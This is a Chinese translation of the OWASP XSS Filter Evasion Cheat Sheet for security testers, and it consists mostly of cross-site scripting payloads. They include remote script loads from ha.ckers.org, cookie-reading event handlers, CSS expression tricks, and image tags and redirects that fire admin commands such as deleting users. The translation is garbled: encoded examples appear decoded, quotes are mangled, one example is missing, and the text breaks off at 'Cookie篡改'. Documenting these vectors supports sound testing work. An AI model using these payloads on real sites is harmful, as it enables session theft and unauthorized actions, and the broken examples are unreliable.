译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常的价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了。原因是这篇文章最精华的部分是代码的解释而非代码本身。
一方面为了自己学习,一方面也想让更多国内的xss爱好者去更方便的阅读本文。所以虽然我本身英语很烂,xss技术也很烂,但还是去翻译了这篇文章。当然这也导致最后翻译出来的文章晦涩难懂、不知所云。这个真心向大家说声抱歉啊,也希望大家能及时帮忙提出文中的翻译错误或其他错误。
另外,在翻译过程中,我发现XSS Filter Evasion Cheat Sheet原版本身也存在一些技术上的或是描述上的错误。不过虽然我知道原文中某些地方可能出错,但是我也不知道正确的应该是什么样的,还有就是或许原文本身是对的,但是我理解错了。种种原因吧,最后基本上都按原文在翻译,有些觉得可能存在错误的地方或是我理解不了的地方,我就没有翻译,继续使用英文。希望大家可以帮忙给出翻译或是解释。
如果大家有能力阅读英文的话,尽量阅读原文,即使要看这个翻译版,也配合英文版一起看。不要让我的翻译错误误人子弟啊。最后希望大家可以和我一起解决翻译中的各种错误,把这个中文版维护好。
谢谢
源文档地址:https://www.owasp.org/index.php/XSSFilterEvasionCheatSheet
翻译文档github地址:https://github.com/caomulaodao/XSS-Filter-Evasion-Cheat-Sheet-CN
介绍#
这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录: http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Sheet灵感来源于RSnake的 XSS Cheat Sheet,所以我们对他给予我们的启发表示感谢。我们想要去创建短小简单的参考给开发者去帮助他们预防xss漏洞,而不是创建一个复杂的备忘录去简单的告诉他们需要去预防各种千奇百怪的攻击。所以,OWASP备忘录系列诞生了。
测试#
这个备忘录主要针对那些已经理解了最基本的xss攻击,但是想要深入理解各种过滤器绕过的细微差别的学习者。
请注意大部分的xss攻击向量已经在其代码下方给出了测试过的浏览器列表。
xss 探测器#
注入下面这些代码,在大多数没有特殊xss向量要求而易遭受脚本攻击的地方将会弹出单词“xss”。使用url编码器去编码你的整个代码。小技巧:如果你是急切的需要快去检测一个页面,通常只需要注入轻量的 "<任意字符>" 标签,然后判断输出点是否受到干扰就可以判断是否xss漏洞了。
‘;alert(String.fromCharCode(88,83,83))//‘;alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
xss 探测器2#
如果你没有充足的输入空间去检测页面是否存在xss漏洞。下面这段代码是一个好的简洁的xss注入检测代码。在注入这段代码后,查看页面源代码寻找是否存在看起来像 <XSS verses <XSS这样的输出点从而判断是否存在xss漏洞。
‘‘;!--"<XSS>=&{()}
无过滤绕过#
这是一个常规的xss注入代码,虽然通常它会被防御,但是我们建议首先去尝试它。(引号是不被需要的在任何现代浏览器中,因此这里省略了它。)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
通过javascript指令实现的图片xss#
图片xss依靠javascript指令实现。(IE7.0不支持javascript指令在图片上下文中,但是可以在其他上下文触发。下面的例子展示了一种其他标签依旧通用的原理。)
<IMG SRC="javascript:alert(‘XSS‘);">
无引号无分号#
<IMG SRC=javascript:alert(‘XSS‘)>
不区分大小写的xss攻击向量#
<IMG SRC=JaVaScRiPt:alert(‘XSS‘)>
html 实体#
The semicolons are required for this to work:
<IMG SRC=javascript:alert("XSS")>
重音符混淆#
如果你的javascript代码中需要同时使用单引号和双引号,那么可以使用重音符(`)来包裹javascript代码。它也经常会非常有用因为xss过滤代码未考虑到这个字符。
<IMG SRC=`javascript:alert("RSnake says, ‘XSS‘")`>
畸形的A标签#
跳过href属性,而直接获取xss实质攻击代码...提出被David Cross ~ 已验证在chrome浏览器
<a onmouseover="alert(document.cookie)">xxs link</a>
此外,chrome浏览器喜欢去补全缺失的引号为你。如果你遇到阻碍那么直接省略它们吧,chrome将会正确的帮你补全缺失的引号在URL和script中。
<a onmouseover=alert(document.cookie)>xxs link</a>
畸形的IMG标签#
最早被 Begeek发现(可以短小而干净的运行于任何浏览器),这个xss向量依靠松散的渲染引擎解析IMG标签中被引号包含的字符串来实现。我猜测它最初是为了正确编码而这样实现,但这样让它更加困难去解析html。
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
fromCharCode#
如果没有任何形式的引号被允许,你可以eval()一串fromCharCode在javascript中来创建任何你需要的xss向量。
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
默认SRC属性去绕过SRC域名检测过滤器#
这将绕过绝大多数SRC域名过滤器。插入javascript代码在任何一个事件方法同样适用于任何一个HTML标签,例如Form、Iframe、Input、Embed等等。它也允许任何该标签的相关事件去替换,例如onblur, onclick等,后面我们会附加一个可用的事件列表。由David Cross提供,Abdullah Hussam编辑。
<IMG SRC=# onmouseover="alert(‘xxs‘)">
默认SRC属性通过省略它的值#
<IMG SRC= onmouseover="alert(‘xxs‘)">
默认SRC属性通过完全不设置它#
<IMG onmouseover="alert(‘xxs‘)">
通过error事件触发alert#
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
十进制html编码引用#
所有在中使用javascript指令的xss示例将无法工作在 Firefox 或 Netscape 8.1+,因为它们使用了 Gecko 渲染引擎。使用 XSS Calculator 获取更多信息。
<IMG SRC=javascript:alert( 'XSS‘)>
结尾没有分号的十进制html编码引用#
它是经常有用的在绕过寻找"&#XX;"格式的xss过滤,因为大多数人不知道最多允许7位字符的编码限制。这也是有用的对那些对字符串解码像$tmp_string =~ s/.\&#(\d+);./$1/; 的过滤器,它们错误的认为一个html编码必须要用;去结束。(我是无意中发现)
<IMG SRC=javascript:alert(‘XSS‘)>
结尾没有分号的十六进制html编码引用#
这也是一种实用的xss攻击针对上文的$tmp_string =~ s/.\&#(\d+);./$1/; ,错误的认为数字编码跟随在#后面(十六进制htnl编码并非如此),。使用 XSS Calculator 获取更多信息。
<IMG SRC=javascript:alert(‘XSS‘)>
内嵌TAB#
用来分开xss攻击代码
<IMG SRC="jav ascript:alert(‘XSS‘);">
内嵌被编码的TAB#
用来分开xss攻击代码
<IMG SRC="jav ascript:alert(‘XSS‘);">
内嵌换行符去分开xss代码#
一些网站声称09-13编码的所有字符(十进制)都可以实现这种形式的攻击。这是不正确的。只有09(tab), 10 (换行) 和 13 (回车)可以使用。你可以查看ascii表为更详细的信息。下面四个xss例子展示了这个向量。
<IMG SRC="jav
ascript:alert(‘XSS‘);">
编码回车符去分开xss代码#
注意:上面我编写的三个xss字符串比必须长度的字符串更长,原因是0可以被省略。通常我看到的过滤器假设十六进制和十进制的编码是两到三个字符,正确的应该是一到七个字符。
<IMG SRC="jav
ascript:alert(‘XSS‘);">
没有分割的javascript指令#
null字符也可以作为一个xss向量,但不同于上面。你需要直接注入它们利用一些工具例如Burp Proxy,或是使用 %00 在你的url字符串里。或者如果你想写你自己的注入工具你可以使用vim(^V^@ 会生成null),以及用下面的程序去生成它到一个文本文件中。好吧,我再一次撒谎了。 Opera的老版本(大约 7.11 on Windows)是脆弱的对于一个额外的字符173(软连字符)。但是null字符 %00 是更加的有用或者帮助我们绕过某些真实存在的过滤器通过变动像这个例子中的。
perl -e ‘print "<IMG SRC=java\0script:alert(\"XSS\")>";‘ > out
IMG中javascript之前添加空格和元字符为xss绕过#
xss过滤拼配模式没有考虑单词"javascript:"中可能存在空格是正确的,因为否则将无法渲染。但是这也导致了错误的假设认为你不可以有一个空格在引号和 "javascript:" 单词之间。事实上你可以插入 1-32编码字符(十进制)中的任何字符。
<IMG SRC=" javascript:alert(‘XSS‘);">
非字母数字字符的xss#
Firefox html解析器认为一个非数字字母的字符在一个html关键字中不是有效的,因此这些字符会被视为空白符或是无效的token在html标签之后。这导致很多xss过滤器错误的认为html标签必须是被空白符隔断的。例如,"<SCRIPT\s" != "<SCRIPT/XSS\s":
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
和上面的原理相同,我们继续扩大,Gecko渲染引擎允许字母、数字、html封装字符以外的任何字符位于事件处理器与等号之间。借此我们可以绕过xss过滤器。注意这也是适用于重音符如下所示:
<BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")>
Yair Amit 提示我有一个小区别在 ie和Gecko 渲染引擎之间是在不使用空格的情况下,Gecko仅允许一个斜杠在html标签和参数之间。这可能是有用的在那些不允许输入空格的系统中。
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
额外的开括号#
Franz Sedlmaier提出,利用这个xss向量可以绕过某些检测引擎,因为这些引擎通过拼配最早出现的一对尖括号,并且提取其内部内容作为标签,而没有使用更加有效的算法例如 Boyer-Moore(寻找打开的尖括号以及相关标签的模糊拼配)。最后,代码中的双斜杠可以抑制额外尖括号导致的javascript错误。
<<SCRIPT>alert("XSS");//<</SCRIPT>
没关闭的script标签#
对于使用了 Gecko渲染引擎的Firefox 和 Netscape 8.1 ,你并不需要常规xss中"></SCRIPT>"这部分。 Firefox会帮你闭合标签,并且加入结束标签。多么的体贴啊! Unlike the next one, which doesn‘t effect Firefox, this does not require any additional HTML below it. 如果需要,你可以加入引号,但通常他并不是必须的。注意,我并不清楚这个代码被注入后html代码会闭合成什么样子。
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
script标签中的协议解析#
这个特殊的变体由 ?ukasz Pilorz 提出,并且基于上文中 Ozh提出的协议解析绕过。这个xss例子工作在 IE, 使用IE渲染引擎的Netscape 以及加了在结尾的 Opera。这是非常有用的在输入长度受到限制。域名越短越好。 ".j"是有效的,不需要考虑编码问题因为浏览拿起可以自动识别在一个script标签中。
<SCRIPT SRC=//ha.ckers.org/.j>
半开的HTML/JavaScript xss向量#
不同于 Firefox ,ie渲染引擎不会加入额外的数据到你的页面。但是它允许javascript指令在IMG标签中,这是有用的作为一个xss向量,因为它不需要一个结束的尖括号。你可以使用这个xss向量在任何html标签中,甚至没有用">"闭合标签。 A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn‘t require the end ">". 它也是有效的去对付真实的xss过滤器,我曾经用半开的<IFRAME 标签替代 <IMG 标签去绕过过滤器。
<IMG SRC="javascript:alert(‘XSS‘)"
双开尖括号#
使用一个开始尖括号(<)在向量结尾代替一个关闭尖括号(>)会有不同的影响在 Netscape Gecko 的渲染中。 Without it, Firefox will work but Netscape won‘t。
<iframe src=http://ha.ckers.org/scriptlet.html <
转义javascript中的转义#
当一个应用程序是输出用户自定义的信息到javascript代码中时,例如: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT>。如果你想插入你自己的javascript代码进入它,但是服务器转义了其中的某些引号,这时你需要通过再转义被转义的字符来绕过它。因此使最终的输入代码类似于<SCRIPT>var a="\";alert(‘XSS‘);//";</SCRIPT> 。最终\转义了双引号前被服务器添加的\,从而使双引号不会被转义,因此触发xss向量。xss定位器使用这个方法。
\";alert(‘XSS‘);//
闭合title标签#
这是一个简单的xss向量,可以引入一个恶意的xss攻击。 译者注:titile标签内部不支持html代码,所有内容会被自动转义为普通字符。
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
INPUT image#
<INPUT TYPE="IMAGE" SRC="javascript:alert(‘XSS‘);">
BODY image#
<BODY BACKGROUND="javascript:alert(‘XSS‘)">
IMG DYNSRC(视频剪辑)#
<IMG DYNSRC="javascript:alert(‘XSS‘)">
IMG lowsrc(低分辨率图片)#
<IMG LOWSRC="javascript:alert(‘XSS‘)">
List-style-image#
<STYLE>li {list-style-image: url("javascript:alert(‘XSS‘)");}</STYLE><UL><LI>XSS</br>
List-style-image#
为符号列表嵌入自定义图片的符号。它是只能工作在ie渲染引擎因为使用了javascript指令。这不是一个特别有用的xss向量。
<STYLE>li {list-style-image: url("javascript:alert(‘XSS‘)");}</STYLE><UL><LI>XSS</br>
VBscript in an image#
<IMG SRC=‘vbscript:msgbox("XSS")‘>
Livescript (仅适用于老版本的Netscape)#
<IMG SRC="livescript:[code]">
BODY 标签#
这个方法不需要使用任何"javascript:" 或 "<SCRIPT..." 的变体去实现xss攻击。Dan Crowley特别指出你可以额外的加入一个空格在等号之前("onload ="):
<BODY ONLOAD=alert(‘XSS‘)>
事件处理程序#
它可以被用于上文中的一些共性xss攻击(这是最完整的一个实时更新的在线列表)。感谢Rene Ledosquet 的更新。此外你可以参考 Dottoro Web Reference 或是 events in JavaScript.
- FSCommand() (攻击者可以使用它当执行一个嵌入的flash对象时)
- onAbort() (当使用者终止一张正在载入的图片)
- onActivate() (当对象被被设置为激活元素)
- onAfterPrint() (用户打印或是预览打印工作后激活)
- onAfterUpdate() (激活在一个数据对象当源对象数据更新后)
- onBeforeActivate() (当对象被被设置为激活元素时触发)
- onBeforeCopy() (攻击者执行攻击代码在一个选区被复制到剪贴板之前-攻击者也可以实现它通过execCommand("Copy")函数。)
- onBeforeCut() (攻击者执行攻击代码在在一个选区被剪贴。)
- onBeforeDeactivate() (当激活元素被改变后触发)
- onBeforeEditFocus() (触发在一个可被编辑的元素内的对象当其处于一个 UI-activated状态或是一个可被编辑对象被选择之前)
- onBeforePaste() (用户需要被欺骗执行粘贴或是去触发它通过execCommand("Paste")函数。)
- onBeforePrint() (用户需要被欺骗执行打印或是攻击者可以使用print()或是execCommand("Print")函数。)
- onBeforeUnload() (用户需要被欺骗关闭浏览器-攻击者不可以 unload windows除非它是被执行从其父窗口。)
- onBeforeUpdate() (激活在数据对象在源对象更新数据之后。)
- onBegin() (onbegin 事件被立即触发当元素的声明周期开始后)
- onBlur() (当失去焦点时触发)
- onBounce() (触发当选框对象的behavior属性被设置为"alternate"或是选框的内容抵达窗口的一边。)
- onCellChange() (触发当数据改变在数据provider)
- onChange() (select, text, or TEXTAREA 字段失去焦点或是它们的值是被改变。)
- onClick()(点击事件)
- onContextMenu() (用户需要右击在攻击攻击区域)
- onControlSelect() (当用户去控制一个选择对象时触发。)
- onCopy() (用户需要去copy某些东西或是利用execCommand("Copy")命令)
- onCut() (用户需要copy某些东西或是利用execCommand("Cut") 命令)
- onDataAvailable() (用户改变数据在某个元素上或是攻击者可以执行相同的函数。)
- onDataSetChanged() (当源数据对象被改变时触发)
- onDataSetComplete() (触发当数据是成功获取到从数据源对象)
- onDblClick() (用户双击某个元素。)
- onDeactivate() (当当前元素失去激活状态时触发)
- onDrag() (需要用户拖动某个对象)
- onDragEnd() (需要用户拖动某个对象)
- onDragLeave() (需要用户拖动某个对象从一个有效的位置。)
- onDragEnter() (需要用户拖动某个对象从一个有效的位置。)
- onDragOver() (需要用户拖动某个对象从一个有效的位置。)
- onDragDrop() (用户拖动某个对象(例如文件)到浏览器窗口内。)
- onDragStart() (当用户开始拖动操作时发生。)
- onDrop() (用户拖动某个对象(例如文件)到浏览器窗口内。)
- onEnd() (当生命周期结束时触发)
- onError() (载入document 或 image发生错误时触发)
- onErrorUpdate() (当更新数据源的相关对象时发生错误则触发)
- onFilterChange() (当一个滤镜完成状态改变时触发)
- onFinish() (移动的Marquee文字完成一次移动时触发)
- onFocus() (当窗口获得焦点时攻击者可以执行代码)
- onFocusIn() (当窗口获得焦点时攻击者可以执行代码)
- onFocusOut() (当窗口失去焦点时攻击者可以执行代码)
- onHashChange() (当当前地址的hash发生改变时触发)
- onHelp() (当用户在当前窗口点击F1时触发攻击代码)
- onInput() (可编辑元素中的内容被用户改变后出发)
- onKeyDown() (用户按下一个键)
- onKeyPress() (用户点击或是按下一个键)
- onKeyUp() (用户释放一个键)
- onLayoutComplete() (用户需要去打印或是打印预览)
- onLoad() (攻击者执行攻击代码在窗口载入后)
- onLoseCapture() (可以被触发被releaseCapture() 方法)
- onMediaComplete() (当波翻改一个流媒体文件时,这个事件将触发在文件开始播放前。)
- onMediaError() (当用户打开的页面包含一个媒体文件,并且发生错误时触发)
- onMessage() (当文档对象接受到一个信息时触发)
- onMouseDown() (攻击者需要让用户去点击一张图片。)
- onMouseEnter() (光标移入一个对象或是区域)
- onMouseLeave() (攻击者需要让用户移动光标进入一个图片或是表格,接着再次移出)
- onMouseMove() (攻击者需要让用户移动鼠标进入一个图片或是表格上)
- onMouseOver() (光标移到一个对象或是区域上)
- onMouseUp() (攻击者需要让用户点击一张图片)
- onMouseWheel() (攻击者需要让用户去使用他们的鼠标滚轮)
- onMove() (用户或攻击者需要移动页面)
- onMoveEnd() (用户或攻击者需要移动页面)
- onMoveStart() (用户或攻击者需要移动页面)
- onOffline() (浏览器从在线模式转换到离线模式时发生)
- onOnline() (浏览器从离线模式转换到在线模式时发生)
- onOutOfSync() (interrupt the element‘s ability to play its media as defined by the timeline)
- onPaste() (用户需要去粘贴或是攻击者执行execCommand("Paste") 方法)
- onPause() (当激活元素时间停顿时触发,包括body元素)
- onPopState() (当用户返回会话历史时触发)
- onProgress() (当一个flash动画载入时触发)
- onPropertyChange() (用户或攻击者需要改变一个元素的属性)
- onReadyStateChange() (用户或攻击者需要改变一个元素的属性)
- onRedo() (用户执行再执行操作)
- onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
- onReset() (用户或攻击者重置表单)
- onResize() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
- onResizeEnd() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
- onResizeStart() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
- onResume() (当元素从暂停恢复到激活时触发,包括body元素)
- onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
- onRowsEnter() (用户或攻击者需要改变数据源中的一行)
- onRowExit() (用户或攻击者需要改变数据源中的一行)
- onRowDelete() (用户或攻击者需要删除数据源中的一行)
- onRowInserted() (用户或攻击者需要向数据源中插入一行)
- onScroll() (用户需要滚动,或是攻击者可以执行scrollBy() 函数)
- onSeek() (媒体播放移动到新位置)
- onSelect() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll")
- onSelectionChange() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll")
- onSelectStart() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll")
- onStart() (当marquee元素循环开始时触发)
- onStop() (用户需要点击停止按钮或是离开网页)
- onStorage() (存储区域改变)
- onSyncRestored() (user interrupts the element‘s ability to play its media as defined by the timeline to fire)
- onSubmit() (需要攻击者或用户提交表单)
- onTimeError() (用户或攻击者需要设置一个时间属性例如 dur 的值为无效的值)
- onTrackChange() (用户或攻击者需要改变播放列表的轨迹)
- onUndo() (user went backward in undo transaction history)
- onUnload() (当用户点击一个链接或是按下回车键或是攻击者触发一个点击事件)
- onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
- seekSegmentTime() (this is a method that locates the specified point on the element‘s segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
BGSOUND(背景音乐)#
<BGSOUND SRC="javascript:alert(‘XSS‘);">
& JavaScript 包含#
<BR SIZE="&{alert(‘XSS‘)}">
样式表#
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS‘);">
远程样式表#
(通过某些方式例如最简单的远程样式表,你可以在表达式类型的样式参数中嵌入xss代码)。它是仅仅工作在IE浏览器或是使用了IE渲染引擎的Netscape 8.1+。需要注意的是页面中并没有展现出它包含了javascript代码。注意:所有的远程样式表xss需要至少页面包含body标签,否则将无法工作。或者页面中包含除了向量本身外的其他内容。因此如果它是一个空白页面,你需要添加至少一个字母到页面确保它可以工作。
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
远程样式表2#
原理与上面相同。但是使用了STYLE标签代替LINK标签。与此向量稍有不同的变异型曾被用于攻击Google Desktop。你也可以移除</STYLE>标签让后面的html去闭合它。在不允许输入等号或是反斜杠的实际环境中这个向量是有用的。
<STYLE>@import‘http://ha.ckers.org/xss.css‘;</STYLE>
远程样式表3#
它仅仅可以工作在 Opera 8.0 (no longer in 9.x) ,但它是非常的阴险。根据RFC2616规定,设置一个http头不是 HTTP1.1 规定的一部分,但是很多浏览器仍然允许它(例如Firefox and Opera)。这个技巧是我们可以设置一个http头(与常规http头没有什么不同,除了 Link: http://ha.ckers.org/xss.css; REL=stylesheet)。这样带有xss代码的远程向量将运行javascript。它不被支持在 FireFox。
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
远程样式表4#
它是仅仅工作在 Gecko 渲染引擎。并且需要绑定一个 XUL文件在页面。令人讽刺的是Netscape认为Gecko是更加安全的,因此绝大多是网站会受到这个攻击。
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
分隔javascript在STYLE标签#
这个xss在ie浏览器中会造成无线循环的弹窗
<STYLE>@im\port‘\ja\vasc\ript:alert("XSS")‘;</STYLE>
STYLE属性中使用注释去分隔表达式#
提出被 Roman Ivanov
<IMG STYLE="xss:expr/*XSS*/ession(alert(‘XSS‘))">
IMG样式的表达式#
这是上面xss向量的混合体。不过它展示了STYLE标签被分隔有多困难。同样它也会在ie下造成循环弹窗。
exp/*<A STYLE=‘no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))‘>
STYLE标签(仅支持老版本的Netscape)#
<STYLE TYPE="text/javascript">alert(‘XSS‘);</STYLE>
使用background-image的style标签#
<STYLE>.XSS{background-image:url("javascript:alert(‘XSS‘)");}</STYLE><A CLASS=XSS></A>
使用background的style标签#
<STYLE type="text/css">BODY{background:url("javascript:alert(‘XSS‘)")}</STYLE>
匿名html标签的属性#
IE6.0 和使用了ie渲染引擎的Netscape 8.1+ 并不会关心你创建的html标签存在与否。只要它是以尖括号以及字符开始的。
<XSS STYLE="xss:expression(alert(‘XSS‘))">
本地 htc 文件#
它有一个小的不同与上面的xss向量,因为他使用的 htc 文件必须是当前域的文件。这个文件通过样式属性引入并运行javascript代码实现xss。
<XSS STYLE="behavior: url(xss.htc);">
US-ASCII编码#
US-ASCII 编码 (发现被 Kurt Huwig)。它是使用畸形的ASCII 编码用7bits代替8bits. 这个xss可以绕过绝大多数内容过滤,但是必须当前域的传输形式为 US-ASCII编码方式。或者你自己将当前页面设置为种编码方式 。它是更加有用的去绕过web应用防火墙xss过滤比服务器端的过滤。Apache的 Tomcat是众所周知的 使用US-ASCII编码传输协议。
?script?alert(¢XSS¢)?/script?
META#
关于meta refresh比较奇怪的是它并不会发送一个刷新请求头。因此它通常用于那些不需要引用url的攻击。
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘XSS‘);">
META using data#
URL指令方案是非常的不错,因为它没有明显的SCRIPT单词或是JavaScript 指令出现,而是使用了base64 编码。请查看 RFC 2397了解更多信息或是编码你的代码。你也可以使用 XSS calculator去编码你的html或是javascript代码到base64编码。
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
额外url参数的META#
如果当前网页试图去查找URL参数是否以"http://" 开始,你可以用下列技术绕过(被 Moritz Naumann提出)
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(‘XSS‘);">
IFRAME#
如果一个iframes被允许,那么同时可能会存在大量其他xss问题
<IFRAME SRC="javascript:alert(‘XSS‘);"></IFRAME>
IFRAME 基于事件#
IFrames或其他元素可以使用事件如下(提出被 David Cross)
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
FRAME#
Frames有一系列像iframes一样的问题
<FRAMESET><FRAME SRC="javascript:alert(‘XSS‘);"></FRAMESET>
TABLE#
<TABLE BACKGROUND="javascript:alert(‘XSS‘)">
TD#
像上面一样,TD也可以通过 BACKGROUND 来包含javascript xss向量
<TABLE><TD BACKGROUND="javascript:alert(‘XSS‘)">
DIV background-image#
<DIV STYLE="background-image: url(javascript:alert(‘XSS‘))">
使用 unicoded编码xss利用代码在DIV background-image#
它是被轻微的修改去混淆 url 参数。最早被发现被 Renaud Lifchitz用于攻击hotmail。
附加额外字符在DIV background-image#
Rnaske开发了一个XSS fuzzer去探测可以在开括号和javascript之间加入哪些额外字符在 IE和安全模式下的 Netscape 8.1。这里都是一些十进制的字符,但是你也可以用十六进制来填充。(下面这些编码字符可以被使用:1-32, 34, 39, 160, 8192-8.13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert(‘XSS‘))">
DIV expression#
在冒号和表达式之间添加换行符是一个更加有效的去绕过实际的xss过滤器的表达式变体。
<DIV STYLE="width: expression(alert(‘XSS‘));">
html条件选择注释块#
只能工作在IE5.0 以及更高版或是使用了ie渲染引擎的Netscape 8.1 。 一些网站认为任何包裹在注释中的内容都是安全的,因此它们并不会被移除。这将使我们的xss向量可使用。或者系统可能对某些内容添加注释去试图无害的渲染它。如我们所见,这有时并不起作用。
<!--[if gte IE 4]> <SCRIPT>alert(‘XSS‘);</SCRIPT> <![endif]-->
BASE标签#
工作在ie或是使用了安全模块的Netscape 8.1,你需要使用 "//"去避免javascript错误。它需要当前网站使用相对路径(例如images/image.jpg)而非绝对路径。如果路径开始用一个斜杠(例如"/images/image.jpg"),你需要去掉xss向量中的一个斜杠(只有在两个斜杠的情况下才会起到注释作用)
<BASE HREF="javascript:alert(‘XSS‘);//">
OBJECT标签#
如果允许object标签,那么你也可以注入病毒payloads去感染用户。类似于APPLET标签。下面这个链接文件是一个包含xss代码的html文件。
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
使用一个你可以载入包含有xss代码的flash文件的 EMBED 标签#
点击这个demo,如果你加入属性allowScriptAccess="never" and allownetworking="internal",则可以缓解这个风险(谢谢Jonathan Vanasco 提供的这个信息)
<EMBED SRC=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
在flash中使用ActionScript可以混淆你的xss向量#
a="get"; b="URL(\""; c="javascript:"; d="alert(‘XSS‘);\")"; eval(a+b+c+d);
CDATA混淆的 XML数据岛#
这个xss向量仅可以在IE 和使用了ie渲染引擎的 Netscape 8.1 下工作。它是 Sec Consult在审计雅虎网站时发现。
<XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
使用XML数据岛生成含有javascript代码的当前域xml文件#
它是相同的同上面仅仅代替XML文件为当前域文件。你可以看到结果在下面。
<XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
HTML+TIME 在XML中#
它展示了 Grey Magic 曾将是怎样攻击 Hotmail 和 Yahoo!的。它是仅仅可以工作在ie和使用了ie渲染引擎的Netscape 8.1。并且这段代码需要放在html与body标签之间。
<HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML>
简单的修改字符去绕过过滤器对 ".js"的过滤#
在xss向量你可以重命名你的javascript文件为一个图片
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
SSI (服务器端包含)#
这需要SSI被安装在服务器端去使用这个xss向量。但可能我并不需要提及这点,因为如果你可以运行命令在服务器端,那么毫无疑问会有更加严重的问题存在。
<!--#exec cmd="/bin/echo ‘<SCR‘"--><!--#exec cmd="/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>‘"-->
PHP#
需要php被安装在服务器端去使用这个xss向量。同样的,如果你可以运行任何远程脚本,那么将会有更加严重的问题。
<? echo(‘<SCR)‘; echo(‘IPT>alert("XSS")</SCRIPT>‘); ?>
嵌入命令的IMG#
它是用于那些需要用户认证后才可以访问的页面,并且在访问这些页面的过程中会执行某些命令。因此它将可以创建或删除用户(如果访问者是管理员),或是寄送某些凭证等等,虽然它是较少被使用但是是非常有用的。
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
嵌入命令的IMG II#
这是更加的可怕,因为并没有特别的标识符去鉴别它是否可疑。除非不允许引入第三方域的图片。这个向量是使用一个 302 or 304(或其他可行方案)去重定向一个图片地址为带有某些命令的地址。因此一个正常的图片标签代码<IMG SRC="a.jpg">可以是带有命令的xss向量。但是用户看到的仅仅是正常的图片链接地址。下面是一个.htaccess(apche下)配置文件去完成这个向量。(感谢Timo为这部分。)
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Cookie篡改#
